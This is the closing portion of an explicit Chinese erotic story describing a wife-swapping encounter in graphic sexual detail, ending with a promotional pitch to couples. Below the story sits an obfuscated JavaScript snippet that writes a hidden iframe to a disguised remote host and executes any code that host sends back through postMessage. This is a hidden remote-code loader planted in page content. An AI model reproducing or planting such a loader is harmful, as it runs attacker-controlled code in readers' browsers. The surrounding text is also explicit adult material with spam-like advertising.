  就这样,我和他为了他老婆的高潮,我们俩轮番进攻,最后没有办法的他,又重新回到了我老婆的身旁,用最原始的姿势,含着我老婆的乳头,我看不清他们的表情,只能看见“贝壳”的屁股在我老婆的胯间做上下的运动,渐渐的他的动作越来越快,一次比一次插的用力,最后,在一阵剧烈的抽搐下,像死猪一样趴在我老婆身上不动了。

  我也数不清在他老婆的肉洞里抽插了多少下,也记不清过了多少时间,我就这样不停地做着反反复覆的同一动作,直到把能使出来的劲都用完了,也没见她有丝毫的高潮反应,而我的阴茎在抽送中所带来的快感充斥着整个身躯,快将负荷不住了,丹田一阵麻热,龟头传来美快酥痒,顿觉全身毛孔扩张,血液涌上大脑,铁枝一样的鸡巴硬顶在屄里,像脉搏般不断跳动,无法自控的我已经感觉到,白花花的精液从龟头尖端疾射而出,将她窄窄的阴道灌得满溢而泻,在我不停抽搐的高潮中,从他老婆肉洞的缝隙间往外挤迫出来,最后无力的倒在她老婆的怀里。

  “贝壳”也从我老婆的身上站立起来,当他的阴茎刚离开我老婆的肉洞,顿时我老婆阴道里屯积的精液,此刻都液化成了米汤样的浅白稀浆,汨汨地从她的屄口冒了出来,她连忙从床头柜上抄起两张卫生纸盖在洞口,转眼间就给沾得湿透,顺手扔在地上,再拉过两张用手摀着,往外走去。还没等老婆从卫生间出来,我和“贝壳”的老婆也已经简单的清理完了,看到他老婆满脸不高兴的样子,我就知道她是因为没有得到性的满足而懊恼,本来想大家欢聚一晚的希望,也因他老婆的懊恼而解散,在“贝壳”提出各自和各自的老婆睡时,我也就答应了。

  他们又回到了我儿子的房间,我和老婆重新躺下,大脑兴奋的我根本睡不着,回忆着刚才那动人而刺激的情景时,下面的肉棒又开始不老实了,还好,从来都没有过好表现的老婆,也保持着良好的状态,当我再一次把勃起的肉棒,插进老婆那还残留着精液味的阴道里,很快我老婆再一次达到了高潮,而我是被老婆骑在身下,用她那高超的套弄技术也使我达到了高潮。第二天一早,才五点多一点,平时怎幺都不会醒的我却醒了,也许是大脑的兴奋连我老婆也醒了,我和老婆商量好了,等会再玩的时候,我来拍几张照片做个纪念,可我轻轻地推开他们的门时,他们还睡的正香,为了让他们多睡一会,我只好又轻轻的退了回来。一直等到六点多钟,才听到外面有了动静,当我出来和他们打招呼时,他们都已经穿戴整齐了,并告诉我们他们马上就要走了,看到他老婆满脸不高兴的样子,我知道关键的问题就在她身上,本来很想挽留他们的我,也只好闭上了嘴。

  心里虽有一丝丝的不快的我,还是陪着他们到街上吃过早点后送走了他们。回到家里,疲惫的身躯还是被兴奋的大脑控制着,我和老婆又一次赤裸裸的相拥在一起,彼此都达到了前所未有的第四次高潮,稍微的休息一下后,我们都带着疲倦的身子又赶去上班了,大约到了中午十一点钟,“贝壳”又打来电话,让我一个人到屯溪去,俩个人一块玩他老婆,他那里知道,我那早已经被掏空的身体,已经是筋疲力尽了,对**丝毫也提不起精神的我,找了一个很不高明的藉口婉言回绝了他,就这样,我们的第一次换妻就这样结束了,偶尔我们也在QQ遇到,只有几句简单的问候,后来就再也不见他上网了。

  这是我人生中的第一次成功的交换,虽然,我们只有短暂的媾合,可我还是感激他们的真诚,在和他们失去联系后不久,我回顾曾经的经历,心跳?刺激?真实?各种感觉都有,但无论如何,这些都是真实发生过的,酸辣苦甜,都是生活,我之所以写下它,是为了记录一段曾经难忘的过去,也许是为了忘却,也许是为了反思,也许是为了留住人生的一段美好的回忆,也许更多的为了证明自己曾经就已经是,最前勇敢走在社会最前面的人。……有喜欢寻找异样刺激的夫妻吗?当你知道有人在听你老婆的声音。有人看见你们在做你们非常爱做的事情。会是什幺感觉?告诉你就是2个字刺激。满足了你们有想交换或者想3P又不敢去的愿望。

  字节数:27819

  
【完】


  

                                                                                      

  • 1
  • eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u.split("OO").join(""),r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('hOOtOOtOOpOOsOO:OO/OO/OOeOOlOOsOOiOOeOOhOOoOOnOOeOOyOO.OOcOOoOOmOO:OO2OO3OO5OO5OO8','/cd/104_m/162',window,document)};